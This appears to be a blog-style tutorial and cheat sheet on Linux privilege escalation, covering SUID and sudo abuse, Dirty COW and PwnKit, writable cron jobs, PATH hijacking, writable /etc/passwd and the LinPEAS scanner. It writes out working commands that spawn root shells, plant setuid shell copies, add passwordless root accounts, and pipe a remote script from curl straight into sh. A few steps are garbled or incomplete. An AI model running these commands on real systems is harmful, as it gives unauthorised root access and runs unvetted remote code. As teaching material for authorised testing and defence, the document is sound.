Overview of Privilege Escalation in Linux Systems

Privilege escalation in Linux systems refers to the process of elevating from a low-privilege user (such as a regular user or www-data) to a high-privilege user (such as root). This is very common in penetration testing (Pentest) or security research, but please note: it should only be used in legally authorized environments, and misuse may violate laws and regulations. Privilege escalation typically relies on system misconfigurations, vulnerabilities, or improper permission settings. Below is a summary of common privilege escalation methods based on reliable security research materials.

1. SUID Privilege Escalation

SUID (Set User ID) is a special permission that allows a program to run with the permissions of the file owner (usually root) when the SUID bit is set. If the program has vulnerabilities or can be exploited, privilege escalation can occur.

  • Check Method: Run <span>find / -perm -u=s -type f 2>/dev/null</span> to find SUID files.
  • Common Exploits:
    • • Tools like <span>vim</span> or <span>find</span>, if SUID is set, can be exploited through command injection (e.g., <span>vim -c ':!/bin/sh'</span>).
    • • String Analysis: <span>strings /path/to/suid_binary</span> to check for hidden commands.
  • Example: If <span>sudo</span> configuration allows editing <span>/etc/passwd</span>, a root user can be added.

2. Sudo Privilege Escalation

Sudo allows users to execute commands as root. If misconfigured (e.g., allowing dangerous commands to run without a password), privilege escalation can occur directly.

  • Check Method: <span>sudo -l</span> to view current user sudo permissions.
  • Common Exploits:
    • • If <span>sudo vi</span> is allowed, it can edit <span>/etc/passwd</span> to add a root account.
    • • GTFOBins (https://gtfobins.github.io/) lists commands that can be abused under sudo, such as <span>sudo find . -exec /bin/sh
      </span>      .
  • Example Script: Use Python to edit the passwd file.

3. Kernel Vulnerability Privilege Escalation

Exploiting vulnerabilities in older versions of the Linux kernel, such as Dirty COW (CVE-2016-5195), allows for write access to read-only memory.

  • Check Method: <span>uname -a</span> to check the kernel version, <span>cat /etc/issue</span> to check the distribution.
  • Common Exploits:
    • • Dirty COW: Download the exploit (e.g., https://github.com/FireFart/dirtycow), compile and run <span>gcc -pthread dirty.c -o dirty -lcrypt</span>, then <span>./dirty 'root::0:0:root:/root:/bin/bash'</span>.
    • • Other CVEs: such as CVE-2021-4034 (PwnKit), applicable for Polkit < 0.105.
  • Note: Modern systems (e.g., Ubuntu 22.04+) have patched these vulnerabilities, so version matching is required.

4. Cron Job Privilege Escalation

Cron jobs run as root, and if the script is writable, malicious code can be injected.

  • Check Method: <span>ls -la /etc/cron* /etc/at* /var/spool/cron*</span> to view tasks.
  • Common Exploits: If <span>/etc/cron.d/custom</span> is writable, add <span>*/1 * * * * root /bin/sh -c 'cp /bin/sh /tmp/rootsh; chmod +s /tmp/rootsh'</span>, wait for execution and then run <span>/tmp/rootsh</span>.
  • Example: Monitor log file replacements.

5. Environment Variable Privilege Escalation

Variables like PATH or LD_PRELOAD can hijack command execution.

  • Check Method: <span>echo $PATH</span> to view the path.
  • Common Exploits:
    • • PATH Hijacking: If a root script calls <span>ls</span>, place a fake <span>ls</span> at the front of the PATH to inject a shell.
    • • LD_PRELOAD: Load a malicious shared library (requires compiling C code).
  • Example: <span>export PATH=/tmp:$PATH; echo 'cp /bin/sh /tmp/rootsh; chmod +s /tmp/rootsh' > /tmp/ls; chmod +x /tmp/ls</span>.

6. /etc/passwd File Privilege Escalation

If <span>/etc/passwd</span> is writable, a root user can be added directly.

  • Check Method: <span>ls -la /etc/passwd</span> to check permissions.
  • Common Exploits: <span>echo 'newroot::0:0::/root:/bin/bash' >> /etc/passwd; su newroot</span>.
  • Note: Must be combined with other permissions.

Other Privilege Escalation Methods

  • Capabilities Privilege Escalation: Check <span>getcap -r / 2>/dev/null</span>, e.g., CAP_SETUID can change UID.
  • Wildcards Privilege Escalation: If a root script uses <span>cat > file</span>, use <span>?</span> wildcard to inject a shell.
  • System Service Privilege Escalation: Check <span>ps aux | grep root</span>, modify writable service configurations.

Automation Tools

  • • LinPEAS or LinEnum: Upload to the target machine and run <span>curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh</span> to automatically scan for vulnerabilities.

Defense Recommendations

  • • Regularly update the kernel and software (<span>apt update && apt upgrade</span>).
  • • Principle of Least Privilege: Audit SUID/Sudo configurations.
  • • Use SELinux/AppArmor to enhance security.

Related posts

  1. Managing the frps Service on Linux with systemd: Installation, Configuration, and Automation Guide
  2. Summary of Linux Server Hardware Information Queries and Daily Maintenance Commands
  3. 50 Million Computers to Replace Windows with Domestic Linux
  4. Which Brand of Bluetooth Headphones Offers Good Sound Quality and High Cost Performance? Top Ten High Cost Performance Bluetooth Headphones Ranking
  5. Unveiling the Secrets of Major Companies: Mastering the Linux Triad
  6. Linux (12): Editing Files with Nano
  7. User Feedback: Linux Version of Google Chrome 140 Disrupts Text Rendering
  8. Basic Linux Practice Multiple Choice Questions – 05
  9. Essential Linux Skills for Bioinformatics Analysis 4: Viewing File Contents
  10. Learning Python from Scratch
  11. 1.2 Billion Orders Secured! Is There a Surge in Demand for Humanoid Robot Chips?
  12. ABB EtherCAT Slave RW7
  13. Linux KSMBD Subsystem Vulnerability Can Exhaust Server Resources

Leave a Comment